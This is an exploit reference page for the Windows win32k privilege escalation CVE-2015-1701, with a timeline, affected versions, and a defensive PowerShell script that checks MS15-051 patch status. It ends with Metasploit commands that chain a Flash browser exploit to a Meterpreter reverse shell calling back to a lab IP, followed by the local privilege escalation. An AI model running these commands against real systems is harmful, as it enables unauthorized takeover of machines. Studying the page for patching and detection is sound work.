CVE-2015-1701 Windows ClientCopyImage Win32k Exploit

Timeline :

Vulnerability discovered being exploited in the wild by FireEye on 2015-04-13
Patch provided by the vendor via MS15-051 on 2015-05-12
PoC provided by hfiref0x on 2015-05-12
Metasploit PoC provided on 2015-06-03

PoC provided by :

Unknown
hfiref0x
OJ Reeves
Spencer McIntyre

Reference(s) :

CVE-2015-1701
MS15-051

Affected version(s) :

Windows Server 2003 Service Pack 2
Windows Vista Service Pack 2
Windows Server 2008 Service Pack 2
Windows 7 Service Pack 1

Tested on :

Windows 7 SP1 (64-bit) with IE8 and Adobe Flash 17.0.0.188 (CVE-2015-3105) for remote exploitation

Description :

This module exploits improper object handling in the win32k.sys kernel-mode driver to escalate privileges. It has been tested on vulnerable builds of Windows 7 x64 and x86, and on Windows 2008 R2 SP1 x64.
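From the defender's side, the useful check is whether a host sits in the affected-version list above and whether the MS15-051 update is present. The PowerShell below is an added example written for this page, not part of the Metasploit module or any vendor tooling. It assumes the reader supplies the Knowledge Base article number that ships MS15-051 (the page does not list it, so a placeholder is used) and that the host is one of the Windows releases named in "Affected version(s)".

```powershell
# Added example: verify MS15-051 (CVE-2015-1701) patch status on the local host.
# Assumption: $PatchKb is set to the KB id that delivers MS15-051; the
# placeholder below must be replaced before use.
param(
    [string]$PatchKb = 'KB<MS15-051 article number>'   # placeholder, not from the page
)

# Windows releases the page lists as affected (captions as reported by WMI/CIM).
$AffectedCaptions = @(
    'Microsoft Windows Server 2003',
    'Microsoft Windows Vista',
    'Microsoft Windows Server 2008',
    'Microsoft Windows 7'
)

function Test-Ms15051Exposure {
    param([string]$Kb)

    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $inScope = $false
    foreach ($caption in $AffectedCaptions) {
        if ($os.Caption -like "$caption*") { $inScope = $true }
    }

    # Get-HotFix errors when the id is absent; treat that as "not installed".
    $patched = $false
    try {
        $null = Get-HotFix -Id $Kb -ErrorAction Stop
        $patched = $true
    } catch { $patched = $false }

    # Report the kernel-mode driver the vulnerability lives in, for inventory.
    $win32k = Get-Item (Join-Path $env:SystemRoot 'System32\win32k.sys') -ErrorAction SilentlyContinue

    [pscustomobject]@{
        Host             = $env:COMPUTERNAME
        OS               = $os.Caption
        ServicePack      = $os.CSDVersion
        InAffectedList   = $inScope
        PatchInstalled   = $patched
        Win32kVersion    = if ($win32k) { $win32k.VersionInfo.FileVersion } else { 'n/a' }
        Exposed          = ($inScope -and -not $patched)
    }
}

Test-Ms15051Exposure -Kb $PatchKb | Format-List
```

Run it under an account that can query WMI/CIM and the hotfix list; a host that reports `InAffectedList = True` and `PatchInstalled = False` is the one the module above would target, and the `Win32kVersion` field gives you the driver build to compare against the vendor's post-patch file version.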

Commands :

Remote exploitation
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

Local privilege escalation
use exploit/windows/local/ms15_051_client_copy_image
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
set SESSION 1
run

getuid